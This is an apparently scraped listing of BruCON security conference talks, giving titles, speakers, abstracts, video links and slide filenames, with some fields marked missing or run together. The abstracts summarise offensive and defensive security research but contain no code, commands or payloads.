High-speed network design separates components into a “fast-path” and a “slow-path”. An example might be “software defined networks”, where software controls how a switch forwards network traffic. One set of terminology calls this the “data-plane” and “control-plane”. This is a great metaphor for cybersecurity. The “data-plane” is exposed to hackers, and must withstand constant hacker attack while keeping up with link speed traffic. The “control-plane” is hidden from hacker attack, using firewalls or non-routable IP addresses. My DNS server is a “data-plane” DNS. It’s based upon an in-memory table that’s lost due to power outage. It doesn’t store information on a SQL server with transaction logging. Because of this, it can be 10x or even 100x as fast. This is a great attribute for the “data-plane”, but a horrible attribute for the “control-plane”. Its role is to be a “slave” to a “hidden master” server running software like BIND10. The design proposed by this talk is that all DNS should consist of slave DNS servers exposed to the Internet, and that all primary master servers should be hidden from the Internet. From a DNS point of view, I’ll show how UPDATE, NOTIFY, and AXFR/IXFR mechanisms work to maintain this structure. This idea isn’t necessarily new, it’s just that it hasn’t been formalized. People already use caching front-ends for hidden webservers, or separate 10.x.x.x private networks for controlling their public infrastructure routers. The purpose of this talk is to provide a more formal, rigorous discussion of this idea. For example, I’ll demonstrate how the custom TCP/IP stack in my DNS server that bypasses the operating-system stack serves this “data plane” purpose.
https://www.youtube.com/watch?v=cYPmbrsvfxw
BruCON 0x05 - Data Plane Networking.pptx
69
Keynote
0x05
Keynote - Dan Guido
Dan Guido
Dan Guido leads the strategic vision for Trail of Bits products and services and manages its day-to-day operations. His most recent research applied intelligence-driven defense to mass malware and demonstrated that, contrary to popular belief, only a very small number of vulnerabilities are used in these massive exploitation campaigns. Prior to Trail of Bits, Dan was a Senior Security Consultant at iSEC Partners where he provided application security and incident response services to a wide variety of clients in the technology, finance, and media industries. Previously, Dan has worked for the Federal Reserve System where he proposed and developed a centralized function for threat intelligence; a team that used its expert knowledge of attacks in the wild to develop sophisticated, enterprise strategies to mitigate them. In addition to his professional work, Dan is a Hacker in Residence at NYU-Poly where he oversees student research and teaches classes in Application Security and Vulnerability Analysis.
https://www.youtube.com/watch?v=z9UfoAyje-4
BruCON 0x05 - EIP Revisited.pptx
70
Talk
0x05
Building Custom Android Malware for Penetration Testing
Stephan Chenette
In this presentation Stephan will discuss some recent research that emerged when he was asked to build malicious applications that bypassed custom security controls. He will walk through some of the basics of reversing malicious apps for Android as well as common Android malware techniques and methodologies. From the analysis of the wild Android malware, he will discuss techniques and functionality to include when penetration testing against 3rd-party Android security controls.
https://www.youtube.com/watch?v=aeBEYl_vCFw
<<MISSING>>
71
Talk
0x05
CobraDroid
Jake Valletta
“What does this application do?” is a question that analysts often ask themselves when performing an application assessment or analyzing mobile malware. CobraDroid was designed to answer this question. CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!). This talk discusses how CobraDroid can be used for Android malware analysis and application assessments. It will include a discussion of the techniques used to assess applications and a demonstration of the tool.
https://www.youtube.com/watch?v=ZcupwSdKNss
BruCON 0x05 - CobraDroid.pptx
72
Talk
0x05
Realtime analysis and visualization of internet status, from malware to compromised machines
Tiago Balgan Henriques, Tiago Martins, João Gouveia
Nowadays, nearly every day we see a new botnet going up and another one being brought down; looking at this fact the presenters of this talk decided that they needed a way to constantly know and visualize different botnet status. Then we decided we needed to go one step further, and, not only understand how they were growing or shrinking, but to also capture patterns between the different machines that have been compromised and multiple properties of different botnets: • Which port(s) does a certain botnet use? • Which type of protocol? • What type of machine is it? • Is it a personal machine or a gateway with multiple machines behind it? • Is that machine affected by one or more botnets? After we achieved this, we decided to create a fast and useful way to use this data, so we created what we call The Cyberfeed and Project Hyperion, which we will also be doing live demos of. On the cyberfeed side you can access all of our data of all types from sinkholes, to portscans, and even honeypots and do different types of queries, allowing you to access only the data you need and want; combining all this it can provide you with useful information that can even be used in defense. Hyperion is where our visual modules are located; you can easily get visual geospatial information about different botnets and search for information on our portscans.
https://www.youtube.com/watch?v=EokTL29P9po
BruCON 0x05 - Realtime analysis and visualization of internet status, from malware to compromised machines.pptx
73
Devops Panel
0x05
Devops Panel
Security/Ops Memeage: Fitting DevOps, Lean, Risk, Metrics and ITIL/Six Sigma Together. We’ve assembled an all-star team of experts in DevOps, Lean, Risk and Metrics to tell you how they can be used (and abused) for the sake of security. You’ll learn how they are not at odds with each other but in fact are greater than the sum of their parts. You’ll be entertained and also well fed as the panel will bring pastries for audience questions.
https://www.youtube.com/watch?v=tngBElRQ1fY
<<MISSING>>
74
Talk
0x05
.NET: The Framework, the Myth, the Legend
Aloria
.NET has been around forever, yet the amount of tutorials and documentation covering its analysis is rather diffuse. It’s time to give it the beatdown it deserves. This talk will cover the current state of the art in .NET reversing, down from PE format of .NET assemblies through various types of obfuscation, and into reversing tools and techniques. Finally, we’ll demo how to modify the behavior of an obfuscated .NET binary by injecting new code.
https://www.youtube.com/watch?v=nGvhdaZn1zk
BruCON 0x05 - NET The Framework the Myth the Legend.pptx
75
Talk
0x05
Taking the BDSM out of PCI-DSS through open-source solutions
Erin Jacobs and Zack Fasel
At some point as information security practitioners, we all face those god-awful three letters. PCI. Yes. It sucks, it’s not cheap, and Yes, It’s not “real security”. But if you or your client is handling cardholder information, you must SUBMIT! Err... comply.... with over 200 requirements. But how does a technically-minded and security-driven badass meet the letter and intent of PCI without pulling their hair out, spending thousands on vendor solutions that don’t provide holistic security, upsetting management, or just “checking the box” and moving on? Zack and Erin will explore their tried and tested open source solutions implemented by organizations from the small/mid-sized to some of the largest providers in the world to address the requirements of PCI DSS while substantially improving security. This isn’t your grandpa’s high-level theoretical overview, but a deep technical dive with specific configuration guidelines you can implement tomorrow. You too can better devote resources to skilled talent over ineffective or exorbitantly priced products, and let’s start fixing things.
https://www.youtube.com/watch?v=IEBa2lQ6aQA
BruCON 0x05 - Taking the BDSM out of PCI-DSS through open-source solutions.pptx
76
Keynote
0x05
Keynote - Amelia Andersdotter
Amelia Andersdotter
It's worthwhile to speak about regulating the internet and what law means to begin with. I would argue that laws are useful, if they help society resolve conflicts.

I would also argue that we already do regulate the internet, through copyright law, and that the very idea that we didn't regulate the internet in the past is strange. Copyright law case law has taken some time to catch up, but essentially the machinery was always working. However, copyright law is not so useful, because on the internet it creates a lot more conflicts than it solves.

Telecommunications laws we have of course had for a long time. University networks have been built with public money, so that's been some form of "public policy" actually. Telcos are obviously regulated and have always been, albeit in different ways at different times.

Even in privacy laws, we have essentially had the legislation in many European countries since the 1970s. The first Swedish privacy law is from 1973. It was made a European standard through the 1995 directive, and now we are discussing the data protection regulation which speaks clearly of "privacy by design" - a sort of information society service regulation. We want services that fulfill our requirements on a legal as well as on a technical level. The legal level is there to ensure that accountability and responsibility exist, and as a form of industrial policy.
https://www.youtube.com/watch?v=6YUjWFjAyTI
<<MISSING>>
77
Talk
0x05
HTTP Time Bandit
Vaagn Toukharian
While web applications become richer and provide higher levels of user experience, they run increasingly larger amounts of code on both the server and client side. A few of the pages on the web server may be the performance bottlenecks. Identifying those pages gives both the application owner as well as an attacker a chance to be more efficient in performance or attack. We will discuss a method of identifying the weakness of the web application by performing a series of regular requests to it. With some refinements and data normalizations performed on the gathered data, and then performing more testing based on the latter, it is possible to pinpoint the single most resource-consuming (CPU or DB) page of the application. Armed with that information it is possible to perform more efficient DOS/DDOS attacks with very simple tools. The presentation will be accompanied with a few demos of the tool performing testing and attacking on various targets. The tool will be published for interested researchers to play with.
https://www.youtube.com/watch?v=nZc_hiv6sO8
BruCON 0x05 - http time bandit.pdf
78
79
Keynote
0x04
Founder and senior security consultant with InGuardians
Ed Skoudis
With the onslaught of recent headlines containing revelations of nation-state activity in computer attacks, a lot of people are wondering: What the heck is going on? Although controversial in some quarters, the militarization of cyber space proceeds apace. Some think that military operations in cyber space are impossible, impractical, or just plain evil. In this lively and hard-hitting presentation, Ed Skoudis will analyze the trends and look at where such activities may be heading. We'll then focus on some of the ramifications for the hacker community. How could cyber military action impact you and your hacking research? What steps should hackers take to prepare for a significantly more militarized cyber space? We'll discuss those issues, and many more.
<<MISSING>>
BruCON 0x04 - Unleashing The Dogs of Cyberwar.pptx
80
Keynote
0x04
Lead Security Community Outreach and Strategy team at Microsoft
Katie Moussouris
<<MISSING INFO>>
https://www.youtube.com/watch?v=W1fwSYpsBwk
<<MISSING>>
81
Talk
0x04
Introducing the Smartphone Penetration Testing Framework
Georgia Weidman
As smartphones enter the workplace, sharing the network and accessing sensitive data, it is crucial to be able to assess the security posture of these devices in much the same way we perform penetration tests on workstations and servers. However, smartphones have unique attack vectors that are not currently covered by available industry tools. The smartphone penetration testing framework, the result of a DARPA Cyber Fast Track project, aims to provide an open source toolkit that addresses the many facets of assessing the security posture of these devices. We will look at the functionality of the framework including information gathering, exploitation, social engineering, and post exploitation through both a traditional IP network and through the mobile modem, showing how this framework can be leveraged by security teams and penetration testers to gain an understanding of the security posture of the smartphones in an organization. We will also show how to use the framework through a command line console, a graphical user interface, and a smartphone based app. Demonstrations of the framework assessing multiple smartphone platforms will be shown.
https://www.youtube.com/watch?v=qAf8PqyPFro
BruCON 0x04 - Introducing the Smartphone Pentesting Framework .pdf
82
Talk
0x04
HTML5 - A Whole New Attack Vector
Robert McArdle
HTML5 opens up a wide and wonderful new world for Web Designers to explore - bringing fantastic new features that were previously only possible via Flash or horribly over-complicated JavaScript. And HTML5 is not a future technology - chances are your favourite browser already has excellent support built in (unless you are still using IE).

In this talk we will look at HTML5 from an attacker's viewpoint. Because not only does HTML5 bring us the Semantic web, editable content, inbuilt form validation, local storage, awesome video support and the long overdue death of <div> - it also opens up a host of new opportunities for attackers.

We'll look at some of the troublesome new attacks that this new HTML5 standard introduces, how attackers can leverage these attacks to cause untold havoc on your machine, and how - with a little bit of help from some not so over-complicated JavaScript - we can build Botnets in your Browser! I HAVE SHOES! BANANA!
<<MISSING>>
BruCON 0x04 - HTML5 - A Whole New Attack Vector.zip
83
Talk
0x04
Security of National eID (smartcard-based) Web Applications
Raul Siles
National electronic identification (eID) smartcards are used by millions of European citizens, like in Belgium or Spain, as well as worldwide, as a key element to authenticate against critical web applications in both the public and private sectors. This identification technology, commonly used to access a variety of web eGovernment services, plus financial, insurance, and utility companies' websites, is considered secure. However, due to the lack of web auditing and pen-testing tools to thoroughly evaluate the smartcard-based authentication process and subsequent session management capabilities... can we really trust the security of these eID services and web applications? The eID smartcard can be secure but... is it used in a secure way? Let's take an in-depth look at the current landscape through security tools, practical demonstrations, and educational scenarios from real-world penetration tests on a worldwide leading country like Spain, with more than 25 million eIDs.
<<MISSING>>
BruCON 0x04 - Security of National eID.pdf
84
Talk
0x04
Cyberwar : Not What We Were Expecting
Josh Corman and Jericho
With all the hyperbole and rhetoric surrounding "Cyber-War", we've grown blind to the real conflicts. Cyber-War is upon us, but it is NOT like you expected. Citizens are all involved (or will be), but we are not prepared.

The conflicts don't have clean battle lines, aren't fought by or between traditional states, and are far more personal and ideological. Historically, we have only seen cyberwar through failed analogies, or our own greedy lenses. In doing so, we have failed to give proper attention to the subject, let alone understand it. This talk will be more than an honest analysis of the past, present, and near future of cyber-war. From the DARPAnet goals of the Internet, to the original AntiSec's "inevitable conflict", to the guerrilla warfare that we must come to understand, we'll outline what cyber-war isn't and, more importantly, what it is and will become.

When the shit hits the fan, what role will you play? It's past time to prepare yourself; will you be a warrior, minute man, survivalist, or collateral damage?
https://www.youtube.com/watch?v=slvT-GgOzQ0
BruCON 0x04 - CyberWar Not What We Were Expecting.pptx
85
Talk
0x04
A Million Mousetraps: Using Big Data and Little Loops to Build Better Defenses
Allison Miller
In many technical functions, automation is critical to maintaining stable, predictable, and effective operations. Security is no exception, especially in environments with thousands or even millions of customers, transactions, endpoints, or actions -- manual intervention has to be the exception and not the expectation. But how does an organization automate security, given all the complexity of a large threat surface and unpredictable attackers? Many environments (including financial systems, game platforms, and social networks) turn to analytics, specifically risk models, to automate risk detection and security decisions. In this session, we will walk through the process for designing and deploying data-driven models and decision technology.
<<MISSING>>
BruCON 0x04 - A Million Mousetraps Using Big Data and Little Loops to Build Better Defenses - Allison Miller.pdf
86
Talk
0x04
New flaws in WPA-TKIP
Mathy Vanhoef
First, an overview of the WPA-TKIP protocol is given and the currently known attacks are discussed, along with a brief history of WEP. Then two new attacks on WPA-TKIP are presented. The first attack is an efficient and practical denial of service attack where the attacker only has to inject two frames each minute to disrupt all traffic. The second attack describes a scenario where an attacker is able to decrypt all traffic on a WPA-TKIP secured network. The second attack has multiple requirements that are rarely satisfied in real-world environments. Nevertheless, it’s the first known attack on the WPA-TKIP specification capable of decrypting all transmitted traffic.
<<MISSING>>
BruCON 0x04 - New Flaws In WPA TKIP.pdf
87
Talk
0x04
Uncovering SAP vulnerabilities: dissecting and breaking the Diag protocol
Martin Gallo
Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and running critical business processes. In recent years it has become a hot topic in information security, while headlines about hacks against SAP systems increase every day. Although fixes and countermeasures are released monthly by SAP at an incredible rate, the available security knowledge is limited and some components are still not well covered.

SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's a core part of any ABAP-based SAP Netweaver installation. Therefore, if an attacker is able to compromise this component, this would result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security community and several tools were released focused on decompression and sniffing. Nevertheless, the protocol specification is not public and its internal components and inner workings remain unknown; the protocol was not understood and there is no publicly available tool for active exploitation of real attack vectors.

This talk is about taking SAP penetration testing out of the shadows and shedding some light into SAP Diag, by introducing a novel way to uncover vulnerabilities in SAP software through a set of tools that allow analysis and manipulation of the SAP Diag protocol. In addition, we will show how these tools and the knowledge acquired while researching the protocol can be used for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server applications: man-in-the-middle attacks, RFC call injection, rogue SAP server deployment, SAP GUI client-side attacks and more. As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats.
<<MISSING>>
BruCON 0x04 - Uncovering SAP Vulnerabilities.pdf
88
Talk
0x04
Recent Advances in IPv6 SecurityFernando GontThe IPv6 protocol suite was designed to accommodate the present and future growth of the Internet, and is expected to be the successor of the original IPv4 protocol suite. It has already been deployed in a number of production environments, and many organizations have already scheduled or planned its deployment in the next few years. Additionally, a number of activities such as the World IPv6 Day in 2011 and the upcoming World IPv6 Launch Day (scheduled for June 2012) have led to an improvement in IPv6 awareness and an increase in the number of IPv6 deployments.

There are a number of factors that make the IPv6 protocol suite interesting from a security standpoint. Firstly, being a new technology, technical personnel has much less confidence with the IPv6 protocols than with their IPv4 counterpart, and thus it is more likely that the security implications of the protocols be overlooked when the protocols are deployed. Secondly, IPv6 implementations are much less mature than their IPv4 counterparts, and thus it is very likely that a number of vulnerabilities will be discovered in them before their robustness matches that of the existing IPv4 implementations. Thirdly, security products such as firewalls and NIDS’s (Network Intrusion Detection Systems) usually have less support for the IPv6 protocols than for their IPv4 counterparts, either in terms of features or in terms of performance. Fourthly, the security implications of IPv6 transition/co-existence technologies on existing IPv4 networks are usually overlooked, potentially enabling attackers to leverage these technologies to circumvent IPv4 security measures in unexpected ways.

During the last few years, the UK CPNI (Centre for the Protection of National Infrastructure) carried out the first comprehensive security assessment of the Internet Protocol version 6 (IPv6) and related technologies (such as transition/co-existence mechanisms). The result of the aforementioned project is a series of documents that provide advice both to programmers implementing the IPv6 protocol suite and to network engineers and security administrators deploying or operating the protocols. Part of the results of the aforementioned project have been recently published, leading to a number of improvements in many IPv6 implementations, and in the protocol specifications themselves. Fernando Gont will discuss the results of the aforementioned project, introducing the attendees to the “state of the art” in IPv6 security, and providing advice on how to deploy the IPv6 protocols securely. Gont will also discuss recent advances in IPv6 security areas such as Denial of Service attacks, firewall circumvention, network reconnaissance, and First-Hop security, and will describe other IPv6 security areas in which further work is needed. Finally, he will describe some vulnerabilities found in popular IPv6 implementations, such as ND-based Denial of Service attacks, and vulnerabilities arising from the use of predictable IPv6 Fragment Identification or Flow Label values.
https://www.youtube.com/watch?v=Eq6vwJc45eM BruCON 0x04 - Recent Advances in IPv6 Security.pptx
89
Talk
0x04
pMap, the silent killerGregory PickettWith auto-configuration protocols now being added to operating systems and implemented by default in your network devices, hosts are now actively advertising their available attack surfaces to anyone listening on the network.

In this session, I will debut my new tool pMap. pMap listens silently and without sending any packets is able to extract information from these advertisements to discover hosts, to perform a port scan, and to fingerprint operating systems and services on these hosts. A multi-purpose tool this can be used to mitigate the risks advertising hosts bring to your environment or to attack the local segment within the enterprise as well as the public arena when these enterprise hosts leave the safety of the network.

We’ll first cover what makes all this possible, then examine typical network traffic to see what is made available to us, and then demonstrations will be given highlighting the use of the tool’s features in a variety of scenarios from the defensive to the offensive including as part of a remote attack using Metasploit where the tool is deployed as a Metasploit module on a compromised host to allow a silent, undetectable profiling of the remote network. Don't miss it!
<<MISSING>>BruCON 0x04 - Pmap The Silent Killer.pdf
90
Talk
0x04
How I met your pointer (Hijacking client software for fuzz and profit)Carlos GarciaLooking for vulnerabilities in closed source software is particularly difficult when the researcher is confronted with proprietary and/or undocumented protocols. Several approaches could be taken to attack this problem like for example, full reverse engineering or dumb fuzzing. Unfortunately, these are either incredibly time/brain consuming or highly inefficient.

In this talk another way will be shown, namely, the manipulation of client software using binary instrumentation techniques in order to use them as kind of 'double agents' against the server they are talking to.

Some small tools and code examples will be released after the talk for everybody to play with.
https://www.youtube.com/watch?v=rQ36_2qStWg BruCON 0x04 - How I Met Your Pointer.pdf
91
Talk
0x04
Satellite HackingPaul Marsh
What sort of data can be received from the vast numbers of satellites in orbit around the Earth? What are the various types of satellite orbits, and what equipment is needed to start 'hacking' satellites. These questions, and more, will be answered in this talk which discusses satellite hacking techniques. Real life examples of traffic, data and audio communications received will be presented. We'll also take a critical look at a UK military satellite hacking incident which was widely reported in the press, and consider the commonly asked question -"can it be done?"
<<MISSING>><<MISSING>>
92
Talk
0x04
Tactical Surveillance: Look at me now!Chris Nickerson<<MISSING INFO>><<MISSING>><<MISSING>>
93
Talk
0x04
We have you by the gadgetsMickey ShkatovWhy send someone an executable when you can just send them a sidebar gadget?

We will be talking about the Windows gadget platform and the nastiness that can be done with it: how gadgets are made, how they are distributed and, more importantly, their weaknesses.

Gadgets are comprised of JS, CSS and HTML and are applications that the Windows operating system embeds by default. As a result there are a number of interesting attack vectors to explore and take advantage of. We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets.
https://www.youtube.com/watch?v=7TCsOlRmYEQ BruCON 0x04 - We Have You By The Gadgets.pptx
94
Talk
0x04
Moar Anti-Forensics for the Louiseint0x80 (or Dual Core)This presentation is the new and improved anti-forensics version of those "Stupid Pet Tricks" segments on late night US talk shows. Nothing ground-breaking here, but there may be some ideas and techniques presented that forensic investigators haven’t considered or encountered.https://www.youtube.com/watch?v=SHvvhukyO-c <<MISSING>>
95
Talk
0x04
The Defense RESTs: Automation and APIs for Improving SecurityDavid MortmanWant to get better at security? Improve your ops and improve your dev. Most of the security tools you need aren't from security vendors, they don't even need to be commercial. You need tools like chef & puppet, jenkins, logstash + elasticsearch & splunk or even hadoop to name but a few. The key is to centralize management, automate and test.

Testing is especially key; like Jeremiah says, "Hack Yourself First". So many vulnerabilities can be detected automatically. Let the machines do that work and find the basic XSS, CSRF and SQLi flaws, not to mention buffer overflows. Save the manual effort for the more complex versions of the above attacks and for business logic flaws. This is one of those spaces where dedicated security tools are a must. Leverage APIs (and protect API endpoints), be evidence driven. Counter-intuitively, deploy more often, with smaller change sets. Prepare for fail and fail fast, but recover faster. Not just theory: this will include real examples with real code, including open protocols like netconf and open source software like dasein-cloud.

There will be no discussion of APT, DevOps vs NoOps, BYOD or Cloud Security concerns; there will however be baked goods, assuming I can get them through customs.
<<MISSING>>BruCON 0x04 - The Defense RESTs Automation and APIs for Improving Security - David Mortman.pdf
96
97
Keynote
0x03
Why Information Risk Management Is Failing, Why That Matters to Security & What You Can Do About ItAlex HuttonIn many organizations, you don't have to be a rocket surgeon to figure out that there's a disconnect between operational security and risk management. Nor do you have to be Myron Tribus (http://en.wikipedia.org/wiki/Myron_Tribus) to figure out what's wrong with the way we currently discuss and model the world around us. So what do we do about it? Is there any way to have these machinations actually, you know, stop bad guys? Because that would probably be a good thing.

My name is Alex Hutton, and I'm Director of Operational Risk for a financial institution in the United States. In this talk, I'll be discussing what's wrong with information security and risk management, how something we might refer to as "science" can help (I hear it's big in most enlightened countries), and after all this fun and drinking is over, what we can go back to our desks at work and do about it.
https://archive.org/details/brucon2011video<<MISSING>>
98
Talk
0x03
IOS Data Protection InternalsAndrey BelenkoData protection is a feature available for iOS 4 devices with hardware encryption: iPhone 4, iPhone 3GS, iPod touch (3rd generation or later), and all iPad models. Introduction of this feature has complicated the iPhone forensics process because now (almost) all files on the user partition are encrypted and physical dumps are of much less value to examiners: while the filesystem seems to be intact, actual file contents are encrypted and are not suitable for analysis. This talk will provide in-depth information about iOS 4 Data Protection internals.<<MISSING>>BruCON 0x03 - iOS Data Protection Internals - Andrey Belenko.pdf
99
Talk
0x03
Botnet Identification and remediationBarry IrwinModern botnet trends have become increasingly sophisticated both in terms of the techniques used to avoid detection on compromised endpoints, but also in their varied communication channels. The use of IRC as the communications medium of choice for Command & Control (C2) activities has been replaced with sophisticated use of IP and domain fast-fluxing to avoid detection and increase resilience. These techniques largely bypass traditional network security detection and mitigation approaches such as blacklists and intrusion detection systems.

In the ongoing defence against these networks, a number of novel approaches are presented in order to allow an organisation to perform near real-time analysis of network traffic with very low system load. The intention is that an organisation or ISP could use the tools as a means of early identification of compromised hosts participating in the botnet. This paper is comprised of three components, the first two relating to detection mechanisms, and the final one providing a console which can be used for tracking and information aggregation.

The first detection technique utilises passive analysis of DNS traffic collected from the network. Due to its tight integration with the TCP/IP suite, it serves as an ideal transport mechanism for communications. Using a combination of classifiers, a high degree of accuracy is obtained in the identification of fast flux domains, using at most a single DNS packet query. This is in contrast to work done by other researchers which required multiple queries. The detection techniques are tested against sample traffic and it is shown that malicious traffic can be detected with low false positive rates. This can be combined with a more heavyweight scoring system which utilises other metadata such as registrar, domain age and ASN data to further support scoring.

The second component applies a lightweight mathematical classification to observed URLs contained in network traffic. This can either be via a network tap, or integrated into a proxy server solution such as squid. The methods used are able to identify malicious URLs with a high degree of accuracy, while maintaining a low false positive rate. This lightweight solution can be further supported by active queries relating to target ASN, domain registrar, and other existing blacklists and DNSBL systems.

The final component provides a web based management and visualisation system providing integration between the above two classes in order to allow for ease of notification of malicious activity. The anticipated targets for these solutions are academic networks, ISPs and to a lesser extent corporate networks. The intention being that by providing suitable monitoring and analysis of traffic egressing one's network, remediation can be carried out by the organisation closest to the infection – in effect cleaning up one's own back yard. A role that this can play other than the operational one described is to provide researchers with access to suitable data (either live networks or even malware labs) to have an automated means of identifying potentially malicious activity, with very low resource requirements.
<<MISSING>>BruCON 0x03 - Botnet Identification and remediation - Barry Irwin.pdf
100
Talk
0x03
Smart Phones, the weak link in the security chainNick Walker and Werner NelOne of the most rapidly advancing aspects of technology today is the mobile phone. Use of a smart phone has become commonplace within both business and society, and many people rely on these devices in their day to day lives. As they increase in both power and functionality, smart phones become both a feasible target and a weapon for an attacker. With these mobile devices having more externally facing services than most other systems, a large attack surface is available. This talk will show that once compromised, an employee's smart phone is a deadly tool for breaking in and maintaining a foothold on a corporate network. The talk will demonstrate a multi-staged attack on a non-rooted Android handset, running the most common stock firmware versions.<<MISSING>><<MISSING>>